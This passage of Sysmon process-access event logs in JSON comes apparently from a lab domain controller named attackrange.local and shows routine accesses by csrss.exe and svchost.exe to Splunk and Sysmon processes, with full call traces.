Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2331,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:35.329\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F7F-5F25-0000-001042210400}\r\nTargetProcessId: 3424\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:35.329","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F7F-5F25-0000-001042210400}","TargetProcessId":"3424","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2332,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:35.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:35.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2333,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:35.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:35.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2334,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:35.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:35.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2335,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:35.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:35.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2336,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:35.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:35.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2337,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:35.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:35.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2338,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:35.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:35.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2339,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:35.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 